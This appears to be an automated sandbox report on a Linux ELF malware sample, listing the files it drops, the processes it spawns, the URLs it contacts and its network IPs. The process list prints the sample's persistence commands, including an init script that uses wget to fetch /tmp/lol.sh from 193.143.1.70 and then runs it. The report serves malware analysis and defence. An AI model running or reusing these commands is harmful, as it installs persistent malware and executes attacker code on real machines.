Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_64.nn.elf
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/run/user/127/dconf/user
|
very short file (no magic)
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86_64.nn.elf
|
/tmp/x86_64.nn.elf
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
171.3.44.104
|
unknown
|
Japan
|
||
|
2.154.252.137
|
unknown
|
Spain
|
||
|
219.150.205.12
|
unknown
|
China
|
||
|
20.13.132.174
|
unknown
|
United States
|
||
|
147.136.144.245
|
unknown
|
United States
|
||
|
7.1.179.137
|
unknown
|
United States
|
||
|
140.127.116.241
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
34.28.222.127
|
unknown
|
United States
|
||
|
94.84.33.154
|
unknown
|
Italy
|
||
|
103.132.213.224
|
unknown
|
China
|
||
|
24.179.193.140
|
unknown
|
United States
|
||
|
178.150.123.193
|
unknown
|
Ukraine
|
||
|
1.19.143.231
|
unknown
|
Korea Republic of
|
||
|
187.254.169.128
|
unknown
|
Mexico
|
||
|
86.254.230.7
|
unknown
|
France
|
||
|
147.175.130.142
|
unknown
|
Slovakia (SLOVAK Republic)
|
||
|
20.80.4.242
|
unknown
|
United States
|
||
|
121.104.243.186
|
unknown
|
Japan
|
||
|
217.172.236.92
|
unknown
|
Poland
|
||
|
38.75.94.41
|
unknown
|
United States
|
||
|
14.115.211.125
|
unknown
|
China
|
||
|
168.50.44.161
|
unknown
|
United States
|
||
|
8.51.171.162
|
unknown
|
United States
|
||
|
97.60.108.189
|
unknown
|
United States
|
||
|
188.61.169.237
|
unknown
|
Switzerland
|
||
|
110.145.206.19
|
unknown
|
Australia
|
||
|
48.64.26.214
|
unknown
|
United States
|
||
|
132.27.5.95
|
unknown
|
United States
|
||
|
55.90.37.92
|
unknown
|
United States
|
||
|
44.191.104.249
|
unknown
|
United States
|
||
|
137.93.151.135
|
unknown
|
Norway
|
||
|
148.125.43.241
|
unknown
|
United States
|
||
|
46.21.41.130
|
unknown
|
Denmark
|
||
|
133.142.172.218
|
unknown
|
Japan
|
||
|
210.26.7.20
|
unknown
|
China
|
||
|
170.39.1.60
|
unknown
|
Reserved
|
||
|
68.122.111.51
|
unknown
|
United States
|
||
|
137.21.137.113
|
unknown
|
United States
|
||
|
114.239.255.136
|
unknown
|
China
|
||
|
157.52.62.14
|
unknown
|
United States
|
||
|
21.218.112.161
|
unknown
|
United States
|
||
|
28.74.239.178
|
unknown
|
United States
|
||
|
58.83.233.229
|
unknown
|
China
|
||
|
164.58.227.71
|
unknown
|
United States
|
||
|
117.70.18.201
|
unknown
|
China
|
||
|
177.58.20.224
|
unknown
|
Brazil
|
||
|
159.189.17.136
|
unknown
|
United States
|
||
|
82.163.152.53
|
unknown
|
United Kingdom
|
||
|
170.52.103.192
|
unknown
|
Canada
|
||
|
84.32.51.16
|
unknown
|
Lithuania
|
||
|
6.163.130.173
|
unknown
|
United States
|
||
|
222.208.174.36
|
unknown
|
China
|
||
|
87.238.111.105
|
unknown
|
Monaco
|
||
|
176.85.172.3
|
unknown
|
Spain
|
||
|
158.248.189.214
|
unknown
|
Norway
|
||
|
15.162.241.218
|
unknown
|
United States
|
||
|
48.174.69.250
|
unknown
|
United States
|
||
|
114.98.140.91
|
unknown
|
China
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
16.142.19.35
|
unknown
|
United States
|
||
|
53.165.113.160
|
unknown
|
Germany
|
||
|
112.17.189.122
|
unknown
|
China
|
||
|
123.244.31.128
|
unknown
|
China
|
||
|
148.2.178.198
|
unknown
|
Sweden
|
||
|
73.13.16.184
|
unknown
|
United States
|
||
|
49.32.81.96
|
unknown
|
India
|
||
|
58.227.72.18
|
unknown
|
Korea Republic of
|
||
|
102.218.206.66
|
unknown
|
unknown
|
||
|
131.29.240.232
|
unknown
|
United States
|
||
|
211.45.55.164
|
unknown
|
Korea Republic of
|
||
|
122.127.164.165
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
8.85.150.248
|
unknown
|
United States
|
||
|
155.189.168.100
|
unknown
|
United States
|
||
|
13.214.31.249
|
unknown
|
United States
|
||
|
158.75.169.254
|
unknown
|
Poland
|
||
|
20.162.38.206
|
unknown
|
United States
|
||
|
181.108.178.85
|
unknown
|
Argentina
|
||
|
101.232.105.246
|
unknown
|
China
|
||
|
221.127.188.27
|
unknown
|
Hong Kong
|
||
|
65.170.142.255
|
unknown
|
United States
|
||
|
75.24.37.185
|
unknown
|
United States
|
||
|
1.124.93.186
|
unknown
|
Australia
|
||
|
143.244.15.163
|
unknown
|
United States
|
||
|
125.192.110.216
|
unknown
|
Japan
|
||
|
138.112.34.246
|
unknown
|
United States
|
||
|
126.225.202.63
|
unknown
|
Japan
|
||
|
59.125.235.117
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
83.191.131.20
|
unknown
|
Sweden
|
||
|
186.202.55.174
|
unknown
|
Brazil
|
||
|
148.146.128.148
|
unknown
|
United States
|
||
|
218.95.51.42
|
unknown
|
China
|
||
|
59.251.11.218
|
unknown
|
China
|
||
|
30.168.224.70
|
unknown
|
United States
|
||
|
24.197.167.248
|
unknown
|
United States
|
||
|
37.249.1.75
|
unknown
|
Poland
|
||
|
19.43.8.150
|
unknown
|
United States
|
||
|
169.170.30.23
|
unknown
|
United States
|
||
|
125.39.69.89
|
unknown
|
China
|
||
|
104.148.157.71
|
unknown
|
United States
|
||
|
86.71.175.237
|
unknown
|
France
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
419000
|
page execute read
|
|
||
|
419000
|
page execute read
|
|
||
|
2496000
|
page read and write
|
|||
|
7fff525cb000
|
page read and write
|
|||
|
2491000
|
page read and write
|
|||
|
7fff525cb000
|
page read and write
|
|||
|
7fff525dc000
|
page execute read
|
|||
|
51c000
|
page read and write
|
|||
|
51c000
|
page read and write
|
|||
|
2491000
|
page read and write
|
|||
|
51a000
|
page read and write
|
|||
|
7fff525dc000
|
page execute read
|
|||
|
51a000
|
page read and write
|
There are 3 hidden memdumps, click here to show them.